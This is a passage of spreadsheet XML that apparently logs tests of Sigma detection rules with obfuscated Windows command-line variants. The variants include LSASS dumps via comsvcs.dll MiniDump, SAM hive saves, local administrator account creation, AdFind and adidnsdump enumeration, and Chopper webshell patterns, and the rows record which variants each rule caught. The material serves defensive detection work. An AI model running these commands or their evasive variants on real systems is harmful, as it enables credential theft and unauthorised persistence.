      <c r="E537" s="36" t="inlineStr">
        <is>
          <t>powershell -Nop -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F537" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G537" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H537" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I537" s="43" t="n"/>
      <c r="J537" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K537" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="538" ht="15.75" customHeight="1" s="42">
      <c r="A538" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B538" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_rules_discovery</t>
        </is>
      </c>
      <c r="C538" s="36" t="inlineStr">
        <is>
          <t>Firewall Configuration Discovery Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D538" s="36" t="inlineStr">
        <is>
          <t>0e4164da-94bc-450d-a7be-a4b176179f1f</t>
        </is>
      </c>
      <c r="E538" s="36" t="inlineStr">
        <is>
          <t>netsh  advfirewall firewall show rule name=all</t>
        </is>
      </c>
      <c r="F538" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G538" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H538" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I538" s="43" t="inlineStr">
        <is>
          <t>Firewall Configuration Discovery Via Netsh.EXE (0e4164da-94bc-450d-a7be-a4b176179f1f)</t>
        </is>
      </c>
      <c r="J538" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K538" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="539" ht="15.75" customHeight="1" s="42">
      <c r="A539" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B539" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_rules_discovery</t>
        </is>
      </c>
      <c r="C539" s="36" t="inlineStr">
        <is>
          <t>Firewall Configuration Discovery Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D539" s="36" t="inlineStr">
        <is>
          <t>0e4164da-94bc-450d-a7be-a4b176179f1f</t>
        </is>
      </c>
      <c r="E539" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall "firewall" show rule name=all</t>
        </is>
      </c>
      <c r="F539" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G539" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H539" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I539" s="43" t="inlineStr">
        <is>
          <t>Firewall Configuration Discovery Via Netsh.EXE (0e4164da-94bc-450d-a7be-a4b176179f1f)</t>
        </is>
      </c>
      <c r="J539" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K539" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="540" ht="15.75" customHeight="1" s="42">
      <c r="A540" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B540" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_rules_discovery</t>
        </is>
      </c>
      <c r="C540" s="43" t="inlineStr">
        <is>
          <t>Firewall Configuration Discovery Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D540" s="43" t="inlineStr">
        <is>
          <t>0e4164da-94bc-450d-a7be-a4b176179f1f</t>
        </is>
      </c>
      <c r="E540" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall show rule name="all"</t>
        </is>
      </c>
      <c r="F540" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I540" s="43" t="inlineStr">
        <is>
          <t>Firewall Configuration Discovery Via Netsh.EXE (0e4164da-94bc-450d-a7be-a4b176179f1f)</t>
        </is>
      </c>
      <c r="J540" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K540" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="541" ht="15.75" customHeight="1" s="42">
      <c r="A541" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B541" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_view_share_and_sessions_enum</t>
        </is>
      </c>
      <c r="C541" s="36" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE</t>
        </is>
      </c>
      <c r="D541" s="36" t="inlineStr">
        <is>
          <t>62510e69-616b-4078-b371-847da438cc03</t>
        </is>
      </c>
      <c r="E541" s="36" t="inlineStr">
        <is>
          <t>net  view  /all</t>
        </is>
      </c>
      <c r="F541" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G541" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H541" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I541" s="43" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE (62510e69-616b-4078-b371-847da438cc03)</t>
        </is>
      </c>
      <c r="J541" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K541" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="542" ht="15.75" customHeight="1" s="42">
      <c r="A542" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B542" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_view_share_and_sessions_enum</t>
        </is>
      </c>
      <c r="C542" s="36" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE</t>
        </is>
      </c>
      <c r="D542" s="36" t="inlineStr">
        <is>
          <t>62510e69-616b-4078-b371-847da438cc03</t>
        </is>
      </c>
      <c r="E542" s="36" t="inlineStr">
        <is>
          <t>net "view" /all</t>
        </is>
      </c>
      <c r="F542" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G542" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H542" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I542" s="36" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE (62510e69-616b-4078-b371-847da438cc03); Share And Session Enumeration Using Net.EXE (62510e69-616b-4078-b371-847da438cc03)</t>
        </is>
      </c>
      <c r="J542" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K542" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="543" ht="15.75" customHeight="1" s="42">
      <c r="A543" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B543" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_view_share_and_sessions_enum</t>
        </is>
      </c>
      <c r="C543" s="36" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE</t>
        </is>
      </c>
      <c r="D543" s="36" t="inlineStr">
        <is>
          <t>62510e69-616b-4078-b371-847da438cc03</t>
        </is>
      </c>
      <c r="E543" s="36" t="inlineStr">
        <is>
          <t>net view /all \127.0.0.1\..\..</t>
        </is>
      </c>
      <c r="F543" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G543" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H543" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I543" s="43" t="inlineStr">
        <is>
          <t>Share And Session Enumeration Using Net.EXE (62510e69-616b-4078-b371-847da438cc03)</t>
        </is>
      </c>
      <c r="J543" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K543" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="544" ht="15.75" customHeight="1" s="42">
      <c r="A544" s="43" t="n"/>
      <c r="B544" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_susp_usage</t>
        </is>
      </c>
      <c r="C544" s="36" t="inlineStr">
        <is>
          <t>PUA - AdFind Suspicious Execution</t>
        </is>
      </c>
      <c r="D544" s="36" t="inlineStr">
        <is>
          <t>9a132afa-654e-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E544" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" adfind.exe d^o^m^a^i^n^l^i^s^t</t>
        </is>
      </c>
      <c r="F544" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G544" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H544" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I544" s="43" t="inlineStr">
        <is>
          <t>PUA - AdFind Suspicious Execution (9a132afa-654e-11eb-ae93-0242ac130002); Renamed AdFind Execution (df55196f-f105-44d3-a675-e9dfb6cc2f2b)</t>
        </is>
      </c>
      <c r="J544" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K544" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="545" ht="15.75" customHeight="1" s="42">
      <c r="A545" s="43" t="n"/>
      <c r="B545" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_python_adidnsdump</t>
        </is>
      </c>
      <c r="C545" s="36" t="inlineStr">
        <is>
          <t>PUA - Adidnsdump Execution</t>
        </is>
      </c>
      <c r="D545" s="36" t="inlineStr">
        <is>
          <t>26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160</t>
        </is>
      </c>
      <c r="E545" s="36" t="inlineStr">
        <is>
          <t>copy C:\Python39\python.exe C:\Temp\runner.exe &amp;&amp; C:\Temp\runner.exe -m adidnsdump -u DOMAIN\User -p Password ldap://10.10.10.10</t>
        </is>
      </c>
      <c r="F545" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G545" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H545" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I545" s="36" t="n"/>
      <c r="J545" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K545" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="546" ht="15.75" customHeight="1" s="42">
      <c r="A546" s="43" t="n"/>
      <c r="B546" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_python_adidnsdump</t>
        </is>
      </c>
      <c r="C546" s="36" t="inlineStr">
        <is>
          <t>PUA - Adidnsdump Execution</t>
        </is>
      </c>
      <c r="D546" s="36" t="inlineStr">
        <is>
          <t>26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160</t>
        </is>
      </c>
      <c r="E546" s="36" t="inlineStr">
        <is>
          <t>python.exe my_dns_enum.py -u DOMAIN\User -p Password ldap://10.10.10.10</t>
        </is>
      </c>
      <c r="F546" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G546" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H546" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I546" s="43" t="n"/>
      <c r="J546" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K546" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="547" ht="15.75" customHeight="1" s="42">
      <c r="A547" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B547" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_adfind</t>
        </is>
      </c>
      <c r="C547" s="36" t="inlineStr">
        <is>
          <t>Renamed AdFind Execution</t>
        </is>
      </c>
      <c r="D547" s="36" t="inlineStr">
        <is>
          <t>df55196f-f105-44d3-a675-e9dfb6cc2f2b</t>
        </is>
      </c>
      <c r="E547" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().GetTrustRelationships()"</t>
        </is>
      </c>
      <c r="F547" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G547" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H547" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I547" s="36" t="n"/>
      <c r="J547" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K547" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="548" ht="15.75" customHeight="1" s="42">
      <c r="A548" s="43" t="n"/>
      <c r="B548" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C548" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D548" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E548" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F548" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G548" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H548" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I548" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J548" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K548" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="549" ht="15.75" customHeight="1" s="42">
      <c r="A549" s="43" t="n"/>
      <c r="B549" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C549" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D549" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E549" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F549" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G549" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H549" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I549" s="43" t="n"/>
      <c r="J549" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K549" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="550" ht="15.75" customHeight="1" s="42">
      <c r="A550" s="43" t="n"/>
      <c r="B550" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C550" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D550" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E550" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F550" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G550" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H550" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I550" s="43" t="n"/>
      <c r="J550" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K550" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="551" ht="15.75" customHeight="1" s="42">
      <c r="A551" s="43" t="n"/>
      <c r="B551" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C551" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D551" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E551" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F551" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G551" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H551" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I551" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J551" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K551" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="552" ht="15.75" customHeight="1" s="42">
      <c r="A552" s="43" t="n"/>
      <c r="B552" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C552" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D552" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E552" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "&amp;wh^oami&amp;ec^ho"</t>
        </is>
      </c>
      <c r="F552" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G552" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H552" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I552" s="43" t="n"/>
      <c r="J552" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K552" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="553" ht="15.75" customHeight="1" s="42">
      <c r="A553" s="43" t="n"/>
      <c r="B553" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C553" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D553" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E553" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F553" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G553" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H553" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I553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553" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K553" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="554" ht="15.75" customHeight="1" s="42">
      <c r="A554" s="43" t="n"/>
      <c r="B554" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C554" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D554" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E554" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F554" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G554" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H554" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I554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554" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K554" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="555" ht="15.75" customHeight="1" s="42">
      <c r="A555" s="43" t="n"/>
      <c r="B555" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C555" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D555" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E555" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F555" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G555" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H555" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I555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555" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K555" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="556" ht="15.75" customHeight="1" s="42">
      <c r="A556" s="43" t="n"/>
      <c r="B556" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C556" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D556" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E556" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F556" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G556" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H556" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I556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556" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K556" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="557" ht="15.75" customHeight="1" s="42">
      <c r="A557" s="43" t="n"/>
      <c r="B557" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C557" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D557" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E557" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F557" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G557" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H557" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I557" s="43" t="n"/>
      <c r="J557" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K557" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="558" ht="15.75" customHeight="1" s="42">
      <c r="A558" s="43" t="n"/>
      <c r="B558" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C558" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D558" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E558" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F558" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G558" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H558" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I558" s="36" t="n"/>
      <c r="J558" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K558" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="559" ht="15.75" customHeight="1" s="42">
      <c r="A559" s="43" t="n"/>
      <c r="B559" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C559" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D559" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E559" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F559" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G559" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H559" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I559" s="36" t="n"/>
      <c r="J559" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K559" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="560" ht="15.75" customHeight="1" s="42">
      <c r="A560" s="43" t="n"/>
      <c r="B560" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C560" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D560" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E560" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F560" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G560" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H560" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I560" s="43" t="n"/>
      <c r="J560" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K560" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="561" ht="15.75" customHeight="1" s="42">
      <c r="A561" s="43" t="n"/>
      <c r="B561" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C561" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D561" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E561" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F561" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G561" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H561" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I561" s="43" t="n"/>
      <c r="J561" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K561" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="562" ht="15.75" customHeight="1" s="42">
      <c r="A562" s="43" t="n"/>
      <c r="B562" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C562" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D562" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E562" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F562" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G562" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H562" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I562" s="36" t="n"/>
      <c r="J562" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K562" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="563" ht="15.75" customHeight="1" s="42">
      <c r="A563" s="43" t="n"/>
      <c r="B563" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C563" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D563" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E563" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\comsvcs.dll C:\Windows\Temp\c.dll &amp;&amp; rundll32.exe C:\Windows\Temp\c.dll, MiniDump 500 lsass.bin</t>
        </is>
      </c>
      <c r="F563" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G563" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H563" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I563" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J563" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K563" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="564" ht="15.75" customHeight="1" s="42">
      <c r="A564" s="43" t="n"/>
      <c r="B564" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C564" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D564" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E564" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F564" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G564" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H564" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I564" s="43" t="n"/>
      <c r="J564" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K564" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="565" ht="15.75" customHeight="1" s="42">
      <c r="A565" s="43" t="n"/>
      <c r="B565" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C565" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D565" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E565" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
